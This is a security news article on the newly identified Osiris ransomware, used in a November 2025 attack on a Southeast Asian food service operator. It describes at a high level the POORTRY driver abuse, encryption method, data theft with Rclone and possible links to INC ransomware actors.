Researchers identified a new Osiris ransomware used in a November 2025 attack, abusing the POORTRY driver via BYOVD to disable security tools.
Symantec and Carbon Black researchers uncovered a new ransomware strain named Osiris, used in a November 2025 attack against a major Southeast Asian food service franchise operator.
The attackers deployed a malicious driver, POORTRY, abusing the BYOVD technique to disable security software, according to Symantec and VMware Carbon Black threat hunters.
Little is known about Osiris’ developers or whether it’s offered as RaaS, but evidence suggests links to INC ransomware actors.
“While this Osiris ransomware shares a name with a ransomware family from 2016, which was a variant of the Locky ransomware, there is no indication that there is any link between these two families.” reads the report published by Symantec and Carbon Black.
Osiris appears to be a new ransomware strain unrelated to the 2016 Locky-based variant of the same name. The developers and any RaaS model remain unknown, but Broadcom researchers found signs linking the attackers to the INC (Warble) ransomware group.
Osiris is a full-featured ransomware with capabilities to stop services and processes, select files and folders to encrypt, and drop a ransom note. The researchers report that it supports multiple command-line options to define targets, logging, encryption mode (partial or full), and Hyper-V handling. The new ransomware family skips specific file types and system folders, appends a .Osiris extension to encrypted files, deletes VSS snapshots, and terminates database, backup, and productivity processes. The malware uses hybrid ECC and AES-128-CTR encryption with a unique key per file, manages async I/O via completion ports, and leaves an Osiris-MESSAGE.txt ransom note with extortion details and negotiation links.
The attack chain began days before ransomware deployment, when attackers quietly stole data using Rclone and uploaded it to a Wasabi cloud storage bucket. This method, along with reused tools like a Mimikatz variant named kaz.exe, mirrors past Inc ransomware operations, suggesting either imitation or involvement by a former Inc affiliate.